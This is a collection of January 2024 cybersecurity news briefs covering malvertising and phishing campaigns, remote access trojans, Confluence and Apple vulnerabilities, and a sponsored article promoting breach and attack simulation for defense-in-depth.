Jan 26, 2024NewsroomMalvertising / Phishing-as-a-service

Chinese-speaking users have been targeted by malicious Google ads for restricted messaging apps like Telegram as part of an ongoing malvertising campaign.

“The threat actor is abusing Google advertiser accounts to create malicious ads and pointing them to pages where unsuspecting users will download Remote Administration Trojan (RATs) instead,” Malwarebytes’ Jérôme Segura said in a Thursday report. “Such programs give an attacker full control of a victim’s machine and the ability to drop additional malware.”

It’s worth noting that the activity, codenamed FakeAPP, is a continuation of a prior attack wave that targeted Hong Kong users searching for messaging apps like WhatsApp and Telegram on search engines in late October 2023.

The latest iteration of the campaign also adds messaging app LINE to the list of messaging apps, redirecting users to bogus websites hosted on Google Docs or Google Sites.

The Google infrastructure is used to embed links to other sites under the threat actor’s control in order to deliver the malicious installer files that ultimately deploy trojans such as PlugX and Gh0st RAT.

Malwarebytes said it traced the fraudulent ads to two advertiser accounts named Interactive Communication Team Limited and Ringier Media Nigeria Limited that are based in Nigeria.

“It also appears that the threat actor privileges quantity over quality by constantly pushing new payloads and infrastructure as command-and-control,” Segura said.

The development comes as Trustwave SpiderLabs disclosed a spike in the use of a phishing-as-a-service (PhaaS) platform called Greatness to create legitimate-looking credential harvesting pages targeting Microsoft 365 users.

“The kit allows for personalizing sender names, email addresses, subjects, messages, attachments, and QR codes, enhancing relevance and engagement,” the company said, adding it comes with anti-detection measures like randomizing headers, encoding, and obfuscation aim to bypass spam filters and security systems.

Greatness is offered for sale to other criminal actors for $120 per month, effectively lowering the barrier to entry and helping them conduct attacks at scale.

Attack chains entail sending phishing emails bearing malicious HTML attachments that, when opened by the recipients, direct them to a fake login page that captures the login credentials entered and exfiltrates the details to the threat actor via Telegram.

Other infection sequences have leveraged the attachments to drop malware on the victim’s machine to facilitate information theft.

To increase the likelihood of success of the attack, the email messages spoof trusted sources like banks and employers and induce a false sense of urgency using subjects like “urgent invoice payments” or “urgent account verification required.”

“The number of victims is unknown at this time, but Greatness is widely used and well-supported, with its own Telegram community providing information on how to operate the kit, along with additional tips and tricks,” Trustwave said.

Phishing attacks have also been observed striking South Korean companies using lures that impersonate tech companies like Kakao to distribute AsyncRAT via malicious Windows shortcut (LNK) files.

“Malicious shortcut files disguised as legitimate documents are continuously being distributed,” the AhnLab Security Intelligence Center (ASEC) said. “Users can mistake the shortcut file for a normal document, as the ‘.LNK’ extension is not visible on the names of the files.”

Jan 27, 2024NewsroomMalware / Software Update

Mexican financial institutions are under the radar of a new spear-phishing campaign that delivers a modified version of an open-source remote access trojan called AllaKore RAT.

The BlackBerry Research and Intelligence Team attributed the activity to an unknown Latin American-based financially motivated threat actor. The campaign has been active since at least 2021.

“Lures use Mexican Social Security Institute (IMSS) naming schemas and links to legitimate, benign documents during the installation process,” the Canadian company said in an analysis published earlier this week.

“The AllaKore RAT payload is heavily modified to allow the threat actors to send stolen banking credentials and unique authentication information back to a command-and-control (C2) server for the purposes of financial fraud.”

The attacks appear to be designed to particularly single out large companies with gross revenues over $100 million. Targeted entities span retail, agriculture, public sector, manufacturing, transportation, commercial services, capital goods, and banking sectors.

The infection chain begins with a ZIP file that’s either distributed via phishing or a drive-by compromise, which contains an MSI installer file that drops a .NET downloader responsible for confirming the Mexican geolocation of the victim and retrieving the altered AllaKore RAT, a Delphi-based RAT first observed in 2015.

“AllaKore RAT, although somewhat basic, has the potent capability to keylog, screen capture, upload/download files, and even take remote control of the victim’s machine,” BlackBerry said.

The new functions added to the malware by the threat actor include support for commands related to banking fraud, targeting Mexican banks and crypto trading platforms, launching a reverse shell, extracting clipboard content, and fetching and executing additional payloads.

The threat actor’s links to Latin America come from the use of Mexico Starlink IPs used in the campaign, as well as the addition of Spanish-language instructions to the modified RAT payload. Furthermore, the lures employed only work for companies that are large enough to report directly to the Mexican Social Security Institute (IMSS) department.

“This threat actor has been persistently targeting Mexican entities for the purposes of financial gain,” the company said. “This activity has continued for over two years, and shows no signs of stopping.”

The findings come as IOActive said it identified three vulnerabilities in the Lamassu Douro bitcoin ATMs (CVE-2024-0175, CVE-2024-0176, and CVE-2024-0177) that could allow an attacker with physical access to take full control of the devices and steal user assets.

The attacks are made possible by exploiting the ATM’s software update mechanism and the device’s ability to read QR codes to supply their own malicious file and trigger the execution of arbitrary code. The issues were fixed by the Swiss company in October 2023.

Medieval castles stood as impregnable fortresses for centuries, thanks to their meticulous design. Fast forward to the digital age, and this medieval wisdom still echoes in cybersecurity. Like castles with strategic layouts to withstand attacks, the Defense-in-Depth strategy is the modern counterpart — a multi-layered approach with strategic redundancy and a blend of passive and active security controls.

However, the evolving cyber threat landscape can challenge even the most fortified defenses. Despite the widespread adoption of the Defense-in-Depth strategy, cyber threats persist. Fortunately, the Defense-in-Depth strategy can be augmented using Breach and Attack Simulation (BAS), an automated tool that assesses and improves every security control in each layer.

Defense-in-Depth: False Sense of Security with Layers

Also known as multi-layered defense, the defense-in-depth strategy has been widely adopted by organizations since the early 2000s. It’s based on the assumption that adversaries must breach multiple defense layers to compromise valuable assets. Since no singular security control can provide foolproof protection against the wide array of cyber threats, defense-in-depth has become the norm for organizations worldwide. But if every organization uses this strategy today, why are security breaches still so common?

Ultimately, the primary reason is a false sense of security from the assumption that layered solutions will always function as intended. However, organizations shouldn’t put all their faith in multi-layered defenses — they must also stay up-to-date against new attack vectors, possible configuration drifts, and the complex nature of managing security controls. In the face of evolving cyber threats, unsubstantiated trust in defensive layers is a security breach waiting to happen.

Perfecting the Defense-in-Depth Strategy

The defense-in-depth strategy promotes using multiple security controls at different layers to prevent and detect cyber threats. Many organizations model these layers around four fundamental layers: Network, Host, Application, and Data Layers. Security controls are configured for one or more layers to maintain a robust security posture. Typically, organizations use IPS and NGFW solutions at the Network Layer, EDR and AV solutions at the Host Layer, WAF solutions at the Application Layer, DLP solutions at the Data Layer, and SIEM solutions across multiple layers.

Although this general approach applies to nearly all defense-in-depth implementations, security teams cannot simply deploy security solutions and forget about them. In fact, according to the Blue Report 2023 by Picus, 41% of cyber attacks bypass network security controls. Today, an effective security strategy requires a solid understanding of the threat landscape and regularly testing security controls against real cyber threats.

Harnessing the Power of Automation: Introducing BAS into the Defense-in-Depth Strategy

Understanding an organization’s threat landscape can be challenging due to the vast number of cyber threats. Security teams must sift through hundreds of threat intelligence reports daily and decide whether each threat might target their organization. On top of that, they need to test their security controls against these threats to assess the performance of their defense-in-depth strategy. Even if organizations could manually analyze each intelligence report and run a traditional assessment (such as penetration testing and red teaming), it would take far too much time and too many resources. Long story short, today’s cyber threat landscape is impossible to navigate without automation.

When it comes to security control testing and automation, one particular tool stands out among the rest: Breach and Attack Simulation (BAS). Since its first appearance in Gartner’s Hype Cycle for Threat-Facing Technologies in 2017, BAS has become a valuable part of security operations for many organizations. A mature BAS solution provides automated threat intelligence and threat simulation for security teams to assess their security controls. When BAS solutions are integrated with the defense-in-depth strategy, security teams can proactively identify and mitigate potential security gaps before malicious actors can exploit them. BAS works with multiple security controls across the network, host, application, and data layers, allowing organizations to assess their security posture holistically.

LLM-Powered Cyber Threat Intelligence

When introducing automation into the defense-in-depth strategy, the first step is to automate the cyber threat intelligence (CTI) process. Operationalizing hundreds of threat intelligence reports can be automated using deep learning models like ChatGPT, Bard, and LLaMA. Modern BAS tools can even provide their own LLM-powered CTI and integrate with external CTI providers to analyze and track the organization’s threat landscape.

Simulating Attacks in the Network Layer

As a fundamental line of defense, the network layer is often tested by adversaries with infiltration attempts. This layer’s security is measured by its ability to identify and block malicious traffic. BAS solutions simulate malicious infiltration attempts observed ‘in the wild’ and validate the network layer’s security posture against real-life cyber attacks.

Assessing the Security Posture of the Host Layer

Individual devices such as servers, workstations, desktops, laptops, and other endpoints make up a significant portion of the devices in the host layer. These devices are often targeted with malware, vulnerability exploitation, and lateral movement attacks. BAS tools can assess the security posture of each device and test the effectiveness of host layer security controls.

Exposure Assessment in the Application Layer

Public-facing applications, like websites and email services, are often the most critical yet most exposed parts of an organization’s infrastructure. There are countless examples of cyber attacks initiated by bypassing a WAF or a benign-looking phishing email. Advanced BAS platforms can mimic adversary actions to ensure security controls in the application are working as intended.

Protecting Data Against Ransomware and Exfiltration

The rise of ransomware and data exfiltration attacks is a stark reminder that organizations must protect their proprietary and customer data. Security controls such as DLPs and access controls in the data layer secure sensitive information. BAS solutions can replicate adversarial techniques to rigorously test these protection mechanisms.

Continuous Validation of the Defense-in-Depth Strategy with BAS

As the threat landscape evolves, so should an organization’s security strategy. BAS provides a continuous and proactive approach for organizations to assess every layer of their defense-in-depth approach. With proven resilience against real-life cyber threats, security teams can trust their security controls to withstand any cyber attack.

Picus Security pioneered Breach and Attack Simulation (BAS) technology in 2013 and has helped organizations improve their cyber resilience ever since. With Picus Security Validation Platform, your organization can supercharge its existing security controls against even the most sophisticated cyberattacks. Visit picussecurity.com to book a demo or explore our resources like “How Breach and Attack Simulation Fits Into a Multi-layered Defense Strategy” whitepaper.

To grow your understanding of evolving cyber threats, explore the Top 10 MITRE ATT&CK techniques and refine your defense-in-depth strategy. Download the Picus Red Report today.

Note: This article was written by Huseyin Can Yuceel, Security Research Lead at Picus Security, where simulating cyber threats and empowering defenses are our passions.

Jan 23, 2024NewsroomVulnerability / Cyber Attack

Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure.

Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible installations.

The shortcoming affects Confluence Data Center and Server 8 versions released before December 5, 2023, as well as 8.4.5.

But merely days after the flaw became public knowledge, nearly 40,000 exploitation attempts targeting CVE-2023-22527 have been recorded in the wild as early as January 19 from more than 600 unique IP addresses, according to both the Shadowserver Foundation and the DFIR Report.

The activity is currently limited “testing callback attempts and ‘whoami’ execution,” suggesting that threat actors are opportunistically scanning for vulnerable servers for follow-on exploitation.

A majority of the attacker IP addresses are from Russia (22,674), followed by Singapore, Hong Kong, the U.S., China, India, Brazil, Taiwan, Japan, and Ecuador.

Over 11,000 Atlassian instances have been found to be accessible over the internet as of January 21, 2024, although it’s currently not known how many of them are vulnerable to CVE-2023-22527.

“CVE-2023-22527 is a critical vulnerability within Atlassian’s Confluence Server and Data Center,” ProjectDiscovery researchers Rahul Maini and Harsh Jaiswal said in a technical analysis of the flaw.

“This vulnerability has the potential to permit unauthenticated attackers to inject OGNL expressions into the Confluence instance, thereby enabling the execution of arbitrary code and system commands.”

Jan 23, 2024NewsroomVulnerability / Device Security

Apple on Monday released security updates for iOS, iPadOS, macOS, tvOS, and Safari web browser to address a zero-day flaw that has come under active exploitation in the wild.

The issue, tracked as CVE-2024-23222, is a type confusion bug that could be exploited by a threat actor to achieve arbitrary code execution when processing maliciously crafted web content. The tech giant said the problem was fixed with improved checks.

Type confusion vulnerabilities, in general, could be weaponized to perform out-of-bounds memory access, or lead to a crash and arbitrary code execution.

Apple, in a terse advisory, acknowledged that it’s “aware of a report that this issue may have been exploited,” but did not share any other specifics about the nature of attacks or the threat actors leveraging the shortcoming.

The updates are available for the following devices and operating systems –

• iOS 17.3 and iPadOS 17.3 – iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later
• iOS 16.7.5 and iPadOS 16.7.5 – iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation, iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
• macOS Sonoma 14.3 – Macs running macOS Sonoma
• macOS Ventura 13.6.4 – Macs running macOS Ventura
• macOS Monterey 12.7.3 – Macs running macOS Monterey
• tvOS 17.3 – Apple TV HD and Apple TV 4K (all models)
• Safari 17.3 – Macs running macOS Monterey and macOS Ventura

The development marks the first actively exploited zero-day vulnerability to be patched by Apple this year. Last year, the iPhone maker had addressed 20 zero-days that have been employed in real-world attacks.

In addition, Apple has also backported fixes for CVE-2023-42916 and CVE-2023-42917 – patches for which were released in December 2023 – to older devices –

• iOS 15.8.1 and iPadOS 15.8.1 – iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

The disclosure also follows a report that Chinese authorities revealed that they have used previously known vulnerabilities in Apple’s AirDrop functionality to help law enforcement to identify senders of inappropriate content, using a technique based on rainbow tables.